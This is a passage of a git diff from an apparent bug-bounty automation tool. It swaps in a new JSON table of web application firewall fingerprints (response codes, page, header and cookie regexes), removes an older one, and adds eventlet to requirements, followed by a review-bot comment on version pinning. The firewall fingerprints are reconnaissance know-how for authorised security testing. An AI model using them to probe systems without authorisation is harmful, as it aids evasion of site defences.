"cookie": "" + }, + "Cloud Protector (Rohde & Schwarz CyberSecurity)": { + "code": "", + "page": "Cloud Protector.*?by Rohde.{3,8}?Schwarz Cybersecurity|<a href='https?://(?:www\\.)?cloudprotector\\.com/'>R.{1,6}?S.Cloud Protector", + "headers": "", + "cookie": "" + }, + "DDoS-GUARD (DDOS-GUARD CORP.)": { + "code": 
"", + "page": "", + "headers": "ddos-guard", + "cookie": "__ddg1.*?=|__ddg2.*?=|__ddgid.*?=|__ddgmark.*?=" + }, + "Distil (Distil Networks)": { + "code": "", + "page": "cdn\\.distilnetworks\\.com/images/anomaly\\.detected\\.png|distilCaptchaForm|distilCallbackGuard", + "headers": "", + "cookie": "" + }, + "DynamicWeb Injection Check (DynamicWeb)": { + "code": "", + "page": "by dynamic check(.{0,10}?module)?", + "headers": "dw.inj.check", + "cookie": "" + }, + "Eisoo Cloud Firewall (Eisoo)": { + "code": "", + "page": "<link.{0,10}?href=\"/eisoo\\-firewall\\-block\\.css|www\\.eisoo\\.com|&copy; \\d{4} Eisoo In", + "headers": "EisooWAF(\\-AZURE)?/?", + "cookie": "" + }, + "Azure Front Door (Microsoft)": { + "code": "", + "page": "", + "headers": "X-Azure-Ref", + "cookie": "" + }, + "GoDaddy Website Protection (GoDaddy)": { + "code": "", + "page": "GoDaddy (security|website firewall)", + "headers": "", + "cookie": "" + }, + "Greywizard": { + "code": "", + "page": "<(title|h\\d{1})>Grey Wizard|contact the website owner or Grey Wizard|We.ve detected attempted attack or non standard traffic from your ip address", + "headers": "greywizard", + "cookie": "" + }, + "Huawei Cloud Firewall (Huawei)": { + "code": "", + "page": "hwclouds\\.com|hws_security@", + "headers": "HuaweiCloudWAF", + "cookie": "HWWAFSESID=" + }, + "DataPower (IBM)": { + "code": "", + "page": "", + "headers": "X-Backside-Transport", + "cookie": "" + }, + "Imunify360 (CloudLinux)": { + "code": "", + "page": "protected.by.{0,10}?imunify360|powered.by.{0,10}?imunify360|imunify360.preloader", + "headers": "imunify360.{0,10}?", + "cookie": "" + }, + "IndusGuard (Indusface)": { + "code": "", + "page": "This website is secured against online attacks. 
Your request was blocked", + "headers": "IF_WAF", + "cookie": "" + }, + "Instart DX (Instart Logic)": { + "code": "", + "page": "the requested url was rejected|please consult with your administrator|your support id is", + "headers": "X-Instart-Request-ID|X-Instart-Cache|X-Instart-WL", + "cookie": "" + }, + "Janusec Application Gateway (Janusec)": { + "code": "", + "page": "janusec application gateway", + "headers": "", + "cookie": "" + }, + "KeyCDN": { + "code": "", + "page": "", + "headers": "KeyCDN", + "cookie": "" + }, + "LimeLight CDN (LimeLight)": { + "code": "", + "page": "", + "headers": "", + "cookie": "l[mg]_sessid=|limelight" + }, + "LiteSpeed (LiteSpeed Technologies)": { + "code": "403", + "page": "Proudly powered by litespeed web server|www\\.litespeedtech\\.com/error\\-page", + "headers": "LiteSpeed", + "cookie": "" + }, + "Malcare (Inactiv)": { + "code": "", + "page": "firewall.{0,15}?powered.by.{0,15}?malcare.{0,15}?pro|blocked because of malicious activities", + "headers": "", + "cookie": "" + }, + "MaxCDN": { + "code": "", + "page": "", + "headers": "maxcdn", + "cookie": "" + }, + "Mission Control Shield (Mission Control)": { + "code": "", + "page": "", + "headers": "Mission Control Application Shield", + "cookie": "" + }, + "Nemesida (PentestIt)": { + "code": "222", + "page": "@?nemesida(\\-security)?\\.com|Suspicious activity detected.{0,10}?Access to the site is blocked|nwaf@", + "headers": "", + "cookie": "" + }, + "NevisProxy (AdNovum)": { + "code": "", + "page": "", + "headers": "", + "cookie": "Navajo|NP_ID" + }, + "NexusGuard Firewall (NexusGuard)": { + "code": "", + "page": "Powered by Nexusguard|nexusguard\\.com/wafpage/.+#\\d{3};", + "headers": "", + "cookie": "" + }, + "NinjaFirewall (NinTechNet)": { + "code": "", + "page": "<title>NinjaFirewall.{0,10}?\\d{3}.forbidden|For security reasons?.{0,10}?it was blocked and logged", + "headers": "", + "cookie": "" + }, + "NSFocus (NSFocus Global Inc.)": { + "code": "", + "page": "", + 
"headers": "NSFocus", + "cookie": "" + }, + "NullDDoS Protection (NullDDoS)": { + "code": "", + "page": "", + "headers": "NullDDoS(.System)?", + "cookie": "" + }, + "OnMessage Shield (BlackBaud)": { + "code": "", + "page": "Blackbaud K\\-12 conducts routine maintenance|onMessage SHEILD|maintenance\\.blackbaud\\.com|status\\.blackbaud\\.com", + "headers": "onMessage Shield", + "cookie": "" + }, + "Open-Resty Lua Nginx (FLOSS)": { + "code": "406", + "page": "openresty/[0-9\\.]+?", + "headers": "openresty/[0-9\\.]+?", + "cookie": "" + }, + "PentaWAF (Global Network Services)": { + "code": "", + "page": "Penta.?Waf/[0-9\\.]+?.server", + "headers": "PentaWaf(/[0-9\\.]+)?", + "cookie": "" + }, + "PerimeterX": { + "code": "", + "page": "www\\.perimeterx\\.(com|net)/whywasiblocked|client\\.perimeterx\\.(net|com)|denied because we believe you are using automation tools", + "headers": "", + "cookie": "" + }, + "pkSecurity IDS (pkSec)": { + "code": "", + "page": "pk.?Security.?Module|Security.Alert|As this could be a potential hack attack|A safety critical (call|request) was (detected|discovered) and blocked|maximum number of reloads per minute and prevented access", + "headers": "", + "cookie": "" + }, + "PowerCDN": { + "code": "", + "page": "", + "headers": "(.*)?powercdn.com(.*)?|(.*)?powercdn.com(.*)?|PowerCDN", + "cookie": "" + }, + "PT Application Firewall (Positive Technologies)": { + "code": "", + "page": "<h1.{0,10}?Forbidden|<pre>Request.ID:.{0,10}?\\d{4}\\-(\\d{2})+.{0,35}?pre>", + "headers": "", + "cookie": "" + }, + "Puhui": { + "code": "", + "page": "", + "headers": "Puhui[\\-_]?WAF", + "cookie": "" + }, + "Qcloud (Tencent Cloud)": { + "code": "403", + "page": "\u817e\u8baf\u4e91Web\u5e94\u7528\u9632\u706b\u5899", + "headers": "", + "cookie": "" + }, + "Qiniu (Qiniu CDN)": { + "code": "", + "page": "", + "headers": "X-Qiniu-CDN", + "cookie": "" + }, + "Qrator": { + "code": "", + "page": "", + "headers": "QRATOR", + "cookie": "" + }, + "RSFirewall (RSJoomla!)": { 
+ "code": "", + "page": "com_rsfirewall_(\\d{3}_forbidden|event)?", + "headers": "", + "cookie": "" + }, + "Sabre Firewall (Sabre)": { + "code": "", + "page": "dxsupport\\.sabre\\.com|<title>Application Firewall Error|add some important details to the email for us to investigate", + "headers": "", + "cookie": "" + }, + "Safeline (Chaitin Tech.)": { + "code": "", + "page": "safeline|<!\\-\\-\\sevent id:", + "headers": "", + "cookie": "" + }, + "SecKing (SecKing)": { + "code": "", + "page": "", + "headers": "secking(.?waf)?", + "cookie": "" + }, + "SecuPress WP Security (SecuPress)": { + "code": "", + "page": "<(title|h\\d{1})>SecuPress", + "headers": "", + "cookie": "" + }, + "Secure Entry (United Security Providers)": { + "code": "", + "page": "", + "headers": "Secure Entry Server", + "cookie": "" + }, + "SecureSphere (Imperva Inc.)": { + "code": "", + "page": "<(title|h2)>Error|The incident ID is|This page can't be displayed|Contact support for additional information", + "headers": "", + "cookie": "" + }, + "ServerDefender VP (Port80 Software)": { + "code": "", + "page": "", + "headers": "p(ort\\-)?80", + "cookie": "" + }, + "Shadow Daemon (Zecure)": { + "code": "", + "page": "<h\\d{1}>\\d{3}.forbidden<.h\\d{1}>|request forbidden by administrative rules", + "headers": "", + "cookie": "" + }, + "Shield Security (One Dollar Plugin)": { + "code": "", + "page": "You were blocked by the Shield|remaining transgression\\(s\\) against this site|Something in the URL.{0,5}?Form or Cookie data wasn\\'t appropriate", + "headers": "", + "cookie": "" + }, + "SiteGuard (Sakura Inc.)": { + "code": "", + "page": "Powered by SiteGuard|The server refuse to browse the page", + "headers": "", + "cookie": "" + }, + "SiteGround": { + "code": "", + "page": "Our system thinks you might be a robot!|access is restricted due to a security rule", + "headers": "", + "cookie": "" + }, + "Squarespace (Squarespace)": { + "code": "", + "page": "status\\.squarespace\\.com|BRICK\\-\\d{2}", + 
"headers": "Squarespace", + "cookie": "SS_ANALYTICS_ID=|SS_MATTR=|SS_MID=|SS_CVT=" + }, + "SquidProxy IDS (SquidProxy)": { + "code": "", + "page": "", + "headers": "squid(/[0-9\\.]+)?", + "cookie": "Access control configuration prevents your request" + }, + "StackPath": { + "code": "", + "page": "This website is using a security service to protect itself|You performed an action that triggered the service and blocked your request", + "headers": "", + "cookie": "" + }, + "TransIP Web Firewall (TransIP)": { + "code": "", + "page": "", + "headers": "X-TransIP-Backend|X-TransIP-Balancer", + "cookie": "" + }, + "UEWaf (UCloud)": { + "code": "", + "page": "/uewaf_deny_pages/default/img/|ucloud\\.cn", + "headers": "uewaf(/[0-9\\.]+)?", + "cookie": "" + }, + "URLMaster SecurityCheck (iFinity/DotNetNuke)": { + "code": "", + "page": "Ur[li]RewriteModule|SecurityCheck", + "headers": "X-UrlMaster-Debug|X-UrlMaster-Ex", + "cookie": "" + }, + "Viettel (Cloudrity)": { + "code": "", + "page": "Access Denied.{0,10}?Viettel WAF|cloudrity\\.com\\.(vn)?/|Viettel WAF System", + "headers": "", + "cookie": "" + }, + "VirusDie (VirusDie LLC)": { + "code": "", + "page": "cdn\\.virusdie\\.ru/splash/firewallstop\\.png|copy.{0,10}?Virusdie\\.ru", + "headers": "", + "cookie": "" + }, + "WebARX (WebARX Security Solutions)": { + "code": "", + "page": "WebARX.{0,10}?Web Application Firewall|www\\.webarxsecurity\\.com|/wp\\-content/plugins/webarx/includes/", + "headers": "", + "cookie": "" + }, + "WebLand": { + "code": "", + "page": "", + "headers": "protected by webland", + "cookie": "" + }, + "RayWAF (WebRay Solutions)": { + "code": "", + "page": "", + "headers": "WebRay\\-WAF|RaySrv.RayEng/[0-9\\.]+?", + "cookie": "" + }, + "WebSEAL (IBM)": { + "code": "", + "page": "This is a WebSEAL error message template file|WebSEAL server received an invalid HTTP request", + "headers": "WebSEAL", + "cookie": "" + }, + "WebTotem": { + "code": "", + "page": "The current request was blocked.{0,8}?>WebTotem", + 
"headers": "", + "cookie": "" + }, + "West263 CDN": { + "code": "", + "page": "", + "headers": "WS?T263CDN", + "cookie": "" + }, + "wpmudev WAF (Incsub)": { + "code": "403", + "page": "Click on the Logs tab, then the WAF Log.|Choose your site from the list|<h1>Whoops, this request has been blocked!|This request has been deemed suspicious|possible attack on our servers.", + "headers": "", + "cookie": "" + }, + "WTS-WAF (WTS)": { + "code": "", + "page": "<(title|h\\d{1})>WTS\\-WAF", + "headers": "wts/[0-9\\.]+?", + "cookie": "" + }, + "360WangZhanBao (360 Technologies)": { + "code": "493", + "page": "wzws\\-waf\\-cgi|wangshan\\.360\\.cn", + "headers": "qianxin\\-waf|WZWS-Ray|X-Powered-By-360WZB", + "cookie": "" + }, + "XLabs Security WAF (XLabs)": { + "code": "", + "page": "", + "headers": "XLabs Security|By XLabs Security", + "cookie": "" + }, + "Xuanwudun": { + "code": "", + "page": "admin\\.dbappwaf\\.cn/(index\\.php/Admin/ClientMisinform/)?|class=.(db[\\-_]?)?waf(.)?([\\-_]?row)?>", + "headers": "", + "cookie": "" + }, + "YXLink (YxLink Technologies)": { + "code": "", + "page": "", + "headers": "Yxlink([\\-_]?WAF)?", + "cookie": "yx_ci_session=|yx_language=" + } +} diff --git a/bounty_drive/waf_signatures.json b/bounty_drive/waf_signatures.json deleted file mode 100644 index d9e91b2..0000000 --- a/bounty_drive/waf_signatures.json +++ /dev/null 
@@ -1,332 +0,0 @@ -{ - "360 Web Application Firewall (360)" : { - "code" : "493", - "page" : "/wzws-waf-cgi/", - "headers" : "X-Powered-By-360wzb" - }, - "aeSecure" : { - "code" : "", - "page" : "aesecure_denied.png", - "headers" : "aeSecure-code" - }, - "Airlock (Phion/Ergon)" : { - "code" : "", - "page" : "", - "headers" : "AL[_-]?(SESS|LB)" - }, - "Anquanbao Web Application Firewall (Anquanbao)" : { - "code" : "405", - "page" : "/aqb_cc/error/|hidden_intercept_time", - "headers" : "X-Powered-By-Anquanbao" - }, - "Armor Protection (Armor Defense)" : { - "code" : "", - "page" : "This request has been blocked by website protection from Armor", - "headers" : "" - }, - "Application Security Manager (F5 Networks)" : { - "code" : "", - "page" : "The requested URL was rejected\\. Please consult with your administrator\\.", - "headers" : "" - }, - "Amazon Web Services Web Application Firewall (Amazon)" : { - "code" : "403", - "page" : "", - "headers" : "\\bAWS" - }, - "Yunjiasu Web Application Firewall (Baidu)" : { - "code" : "", - "page" : "", - "headers" : "yunjiasu-nginx" - }, - "Barracuda Web Application Firewall (Barracuda Networks)" : { - "code" : "", - "page" : "", - "headers" : "barra_counter_session=|(|\\b)barracuda_" - }, - "BIG-IP Application Security Manager (F5 Networks)" : { - "code" : "", - "page" : "", - "headers" : "BigIP|F5\\Z|\\bTS[0-9a-f]+=|X-WA-Info:|X-Cnection:" - }, - "BinarySEC Web Application Firewall (BinarySEC)" : { - "code" : "", - "page" : "", - "headers" : "binarysec" - }, - "BlockDoS" : { - "code" : "", - "page" : "", - "headers" : "BlockDos\\.net" - }, - "ChinaCache (ChinaCache Networks)" : { - "code" : "400", - "page" : "", - "headers" : "Powered-By-ChinaCache" - }, - "Cisco ACE XML Gateway (Cisco Systems)" : { - "code" : "", - "page" : "", - "headers" : "ACE XML Gateway" - }, - "Cloudbric Web Application Firewall (Cloudbric)" : { - "code" : "", - "page" : "Cloudbric|Malicious Code Detected", - "headers" : "" - }, - "CloudFlare Web 
Application Firewall (CloudFlare)" : { - "code" : "", - "page" : "Attention Required! \\| Cloudflare|CloudFlare Ray ID:|var CloudFlare=|CLOUDFLARE_ERROR_500S_BOX", - "headers" : "cloudflare|__cfduid=|cf-ray" - }, - "CloudFront (Amazon)" : { - "code" : "", - "page" : "", - "headers" : "Error from cloudfront" - }, - "Comodo Web Application Firewall (Comodo)" : { - "code" : "", - "page" : "", - "headers" : "Protected by COMODO WAF" - }, - "CrawlProtect (Jean-Denis Brun)" : { - "code" : "", - "page" : "This site is protected by CrawlProtect", - "headers" : "" - }, - "IBM WebSphere DataPower (IBM)" : { - "code" : "", - "page" : "", - "headers" : "X-Backside-Transport.*?(OK|FAIL)" - }, - "Deny All Web Application Firewall (DenyAll)" : { - "code" : "", - "page" : "Condition Intercepted", - "headers" : "sessioncookie" - }, - "Distil Web Application Firewall Security (Distil Networks)" : { - "code" : "", - "page" : "", - "headers" : "x-distil-cs" - }, - "DOSarrest (DOSarrest Internet Security)" : { - "code" : "", - "page" : "", - "headers" : "DOSarrest|X-DIS-Request-ID" - }, - "dotDefender (Applicure Technologies)" : { - "code" : "", - "page" : "dotDefender Blocked Your Request|<meta name=\\.description\\. 
content=\\.Applicure is the leading provider of web application security|Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)", - "headers" : "X-dotDefender-denied" - }, - "EdgeCast Web Application Firewall (Verizon)" : { - "code" : "400", - "page" : "", - "headers" : "SERVER.*?ECDF" - }, - "ExpressionEngine (EllisLab)" : { - "code" : "", - "page" : "Invalid (GET|POST) Data", - "headers" : "" - }, - "FortiWeb Web Application Firewall (Fortinet)" : { - "code" : "", - "page" : "\\.fgd_icon|\\.blocked|\\.authenticate", - "headers" : "FORTIWAFSID=|cookiesession1=" - }, - "Hyperguard Web Application Firewall (art of defence)" : { - "code" : "", - "page" : "", - "headers" : "ODSESSION=" - }, - "Incapsula Web Application Firewall (Incapsula/Imperva)" : { - "code" : "", - "page" : "Incapsula incident ID|_Incapsula_Resource|subject=WAF Block Page|If you feel you have been blocked in error, please contact Customer Support", - "headers" : "X-Iinfo|incap_ses|visid_incap" - }, - "ISA Server (Microsoft)" : { - "code" : "", - "page" : "The server denied the specified Uniform Resource Locator (URL)\\. 
Contact the server administrator\\.", - "headers" : "" - }, - "Jiasule Web Application Firewall (Jiasule)" : { - "code" : "403", - "page" : "static\\.jiasule\\.com/static/js/http_error\\.js|notice-jiasule", - "headers" : "jiasule-WAF|__jsluid=|jsl_tracking" - }, - "KS-WAF (Knownsec)" : { - "code" : "", - "page" : "ks-waf-error\\.png'", - "headers" : "" - }, - "KONA Security Solutions (Akamai Technologies)" : { - "code" : "400|403|501", - "page" : "", - "headers" : "AkamaiGHost" - }, - "ModSecurity: Open Source Web Application Firewall (Trustwave)" : { - "code" : "", - "page" : "This error was generated by Mod_Security|One or more things in your request were suspicious|rules of the mod_security module", - "headers" : "Mod_Security|NOYB" - }, - "NAXSI (NBS System)" : { - "code" : "", - "page" : "", - "headers" : "naxsi/waf" - }, - "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)" : { - "code" : "", - "page" : "", - "headers" : "NCI__SessionId=" - }, - "NetScaler (Citrix Systems)" : { - "code" : "", - "page" : "", - "headers" : "ns_af=|citrix_ns_id|NSC_|NS-CACHE" - }, - "Newdefend Web Application Firewall (Newdefend)" : { - "code" : "", - "page" : "", - "headers" : "newdefend" - }, - "NSFOCUS Web Application Firewall (NSFOCUS)" : { - "code" : "", - "page" : "", - "headers" : "NSFocus" - }, - "Palo Alto Firewall (Palo Alto Networks)" : { - "code" : "", - "page" : "has been blocked in accordance with company policy", - "headers" : "" - }, - "Profense Web Application Firewall (Armorlogic)" : { - "code" : "", - "page" : "", - "headers" : "PLBSID=|Profense" - }, - "AppWall (Radware)" : { - "code" : "", - "page" : "Unauthorized Activity Has Been Detected.*?Case Number:", - "headers" : "X-SL-CompState" - }, - "Reblaze Web Application Firewall (Reblaze)" : { - "code" : "", - "page" : "", - "headers" : "rbzid=|Reblaze Secure Web Gateway" - }, - "ASP.NET RequestValidationMode (Microsoft)" : { - "code" : "500", - "page" : "ASP\\.NET has detected data in 
the request that is potentially dangerous|Request Validation has detected a potentially dangerous client input value|HttpRequestValidationException", - "headers" : "" - }, - "Safe3 Web Application Firewall" : { - "code" : "", - "page" : "", - "headers" : "Safe3" - }, - "Safedog Web Application Firewall (Safedog)" : { - "code" : "", - "page" : "", - "headers" : "WAF/2\\.0|safedog" - }, - "SecureIIS Web Server Security (BeyondTrust)" : { - "code" : "", - "page" : "SecureIIS.*?Web Server Protection|http://www\\.eeye\\.com/SecureIIS/|\\?subject=[^>]*SecureIIS Error", - "headers" : "" - }, - "SEnginx (Neusoft Corporation)" : { - "code" : "", - "page" : "SENGINX-ROBOT-MITIGATION", - "headers" : "" - }, - "TrueShield Web Application Firewall (SiteLock)" : { - "code" : "", - "page" : "SiteLock Incident ID|sitelock-site-verification|sitelock_shield_logo", - "headers" : "" - }, - "SonicWALL (Dell)" : { - "code" : "", - "page" : "This request is blocked by the SonicWALL|#shd|#nsa_banner|Web Site Blocked.*?\\bnsa_banner", - "headers" : "SonicWALL" - }, - "UTM Web Protection (Sophos)" : { - "code" : "", - "page" : "Powered by UTM Web Protection", - "headers" : "" - }, - "Stingray Application Firewall (Riverbed / Brocade)" : { - "code" : "403|500", - "page" : "", - "headers" : "X-Mapping-" - }, - "CloudProxy WebSite Firewall (Sucuri)" : { - "code" : "403", - "page" : "Access Denied.*?Sucuri Website Firewall|Sucuri WebSite Firewall.*?Access Denied|Questions\\?.*?cloudproxy@sucuri\\.net", - "headers" : "Sucuri/Cloudproxy|X-Sucuri" - }, - "Tencent Cloud Web Application Firewall (Tencent Cloud Computing)" : { - "code" : "405", - "page" : "waf\\.tencent-cloud\\.com", - "headers" : "" - }, - "Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)" : { - "code" : "", - "page" : "", - "headers" : "st8(id|_wat|_wlf)" - }, - "TrafficShield (F5 Networks)" : { - "code" : "", - "page" : "", - "headers" : "F5-TrafficShield|ASINFO=" - }, - "UrlScan (Microsoft)" : { - "code" : "", 
- "page" : "Rejected-By-UrlScan",
- "headers" : "Rejected-By-UrlScan"
- },
- "USP Secure Entry Server (United Security Providers)" : {
- "code" : "",
- "page" : "",
- "headers" : "Secure Entry Server"
- },
- "Varnish FireWall (OWASP)" : {
- "code" : "",
- "page" : "Request rejected by xVarnish-WAF|\\bXID: \\d+",
- "headers" : ""
- },
- "Wallarm Web Application Firewall (Wallarm)" : {
- "code" : "",
- "page" : "",
- "headers" : "nginx-wallarm"
- },
- "WatchGuard (WatchGuard Technologies)" : {
- "code" : "",
- "page" : "",
- "headers" : "WatchGuard"
- },
- "WebKnight Application Firewall (AQTRONIX)" : {
- "code" : "999",
- "page" : "WebKnight Application Firewall Alert|AQTRONIX WebKnight",
- "headers" : "WebKnight"
- },
- "Wordfence (Feedjit)" : {
- "code" : "",
- "page" : "This response was generated by Wordfence|Your access to this site has been limited",
- "headers" : ""
- },
- "Zenedge Web Application Firewall (Zenedge)" : {
- "code" : "",
- "page" : "zenedge/assets/",
- "headers" : "ZENEDGE"
- },
- "Yundun Web Application Firewall (Yundun)" : {
- "code" : "",
- "page" : "",
- "headers" : "YUNDUN"
- },
- "Yunsuo Web Application Firewall (Yunsuo)" : {
- "code" : "",
- "page" : "<img class=.yunsuologo.",
- "headers" : "yunsuo_session"
- }
-}
diff --git a/requirements.txt b/requirements.txt
index 704d8d0..feec47d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -4,3 +4,4 @@ tqdm
 selenium
 webdriver_manager
 sqlmap
+eventlet
\ No newline at end of file
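Review bot: `eventlet` is added to requirements.txt with no version constraint, like the visible neighbours `selenium`, `webdriver_manager` and `sqlmap`, so each install resolves whatever release the index serves that day and two checkouts of the same commit can run different code. Pin the version that was actually tested, e.g. `eventlet==<TESTED_VERSION>` (placeholder), and consider hash-checked installs with `pip install --require-hashes -r requirements.txt` so a replaced or compromised release fails the install instead of being pulled in silently. The new last line also has no trailing newline (`\ No newline at end of file`); add one so the next requirement appended to the file does not fuse onto `eventlet`.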